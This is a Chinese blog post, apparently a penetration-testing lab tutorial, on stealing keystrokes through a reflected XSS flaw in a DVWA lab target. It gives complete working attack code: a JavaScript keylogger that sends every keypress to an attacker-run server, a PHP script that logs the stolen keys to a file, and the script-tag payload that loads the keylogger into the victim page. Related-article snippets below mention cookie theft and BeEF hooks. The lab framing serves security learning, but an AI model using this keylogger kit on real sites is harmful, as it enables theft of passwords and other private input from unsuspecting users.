xss盗取键盘记录实例

最新推荐文章于 2024-08-03 23:00:16 发布
最新推荐文章于 2024-08-03 23:00:16 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whoim_i/article/details/102875110
版权

本实验以反射型xss漏洞为例
实验环境:kali 192.168.133.131
dvwa靶机 192.168.133.128

1、首先看起kali上的apache服务,命令:

/etc/init.d/apache2 start

2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功
在这里插入图片描述
3、 进入kali的/var/www/html路径创建三个文件
Keylogger.js Keylogger.php Keylog.txt
在这里插入图片描述
(1)keylogger.js[js脚本文件]

document.onkeypress = function(evt) {
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode)
    if (key) {
         var http = new XMLHttpRequest(); 
         var param = encodeURI(key)        
         http.open("POST","http://192.168.133.131/Keylogger.php",true);        
         http.setRequestHeader("Content-type","application/x-www-formurlencoded"); 
         http.send("key="+param);   
       } 
  }

(2)keylogger.php 【用于将键盘上的敲击的记录通过POST传送到keylog.txt中】

<?php 
$key = $_POST['key']; 
$log = fopen("keylog.txt","a");
fwrite($log,$key); 
fclose($log);
?>

(3)keylog.txt 【空文件用于接收键盘的记录】

4、xss漏洞测试开始

  1. 在浏览器访问dvwa靶机并且登录
    在这里插入图片描述2. 在输入框中输入以下代码
<script src="http://192.168.133.131/Keylogger.js "></script>

在这里插入图片描述3. 紧接着在这个页面随意敲击键盘并查看keylog.txt是否有记录

在这里插入图片描述

whoim_i
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1142
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
xss-键盘记录
weixin_46164380的博客
03-08 219
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
xss漏洞(三,xss进阶利用)
最新发布
2302_80280669的博客
08-03 672
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 776
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
2. XSS- 键盘记录器和反射型XSS
qq_41860876的博客
12-20 462
任务099:XSS- 键盘记录器和反射型XSS 进行xss利用进行键盘记录发送给黑客 黑客的服务器大部分但是用的肉鸡服务器 1 . 创建一个Keylogger.js文件 下面文件内容 意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php文件document.onkeypress = function(evt) { evt = evt || win...
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 501
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1187
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1688
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
XSS学习笔记
m0_47599604的博客
03-18 575
XSS介绍以及分类 XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 分类 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3159
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
20-5 XSS的利用(包含:蓝莲花、beef-xss
weixin_43263566的博客
01-12 335
存储型XSS是一种特殊类型的XSS攻击。攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1039
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 461
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储型xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
XSS获取键盘原理
鸣蜩十四的博客
08-09 670
涉及的js知识: onkeypress 事件会在键盘按键被按下并释放一个键时发生 fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。 charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值 XMLHttpRequest 对象能够: 在不重新加载页面的情况下更新网页 在页面已加载后从服务器请求数据 在页面已加载后从服务器接收数据 在后台向服务器发送数据 encodeURI(key)对URI 进行完整的编码 http.open第三个参数设置请求是否为
xss漏洞 (跨站脚本攻击)
qq_59607911的博客
10-17 348
标签:</script><script>alert(1)
获取cookie_XSS获取COOKIE
weixin_31467557的博客
01-27 1326
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序中,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车中,二者不能够混淆,因为二者属于是不同的会话。HTTP...
Beef工具使用
热门推荐
wo41ge的博客
02-22 1万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
XSS 测试
keyongle的博客
06-11 3774
原文转载来自:https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.htmlWeb安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的....
XSS获取cookie并利用
kuxing100的专栏
07-11 1826
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
xss盗取cookie
07-28
引用\[3\]描述了一个XSS攻击的实例,其中恶意脚本被插入到URL中,当用户访问该URL时,恶意脚本将被执行,导致用户的cookie信息被显示出来。 要防止XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,以确保...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值